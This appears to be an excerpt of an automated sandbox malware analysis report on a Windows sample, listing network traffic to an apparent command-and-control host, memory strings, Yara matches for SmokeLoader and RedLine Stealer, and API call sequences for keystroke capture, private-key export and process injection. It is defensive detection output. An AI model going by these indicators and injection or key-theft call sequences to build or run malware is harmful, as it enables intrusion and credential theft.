68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2094847936.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094289006.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094815551.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2098614034.000000000C8D3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2097959116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2095504231.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2093454201.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2092180745.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003059000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/;
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000A.00000002.3153296640.000000000302B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php8
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2097959116.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_02FE162B GetKeyboardState,ToUnicode,

18_2_02FE162B

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,

8_2_00007FF6DFE23220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
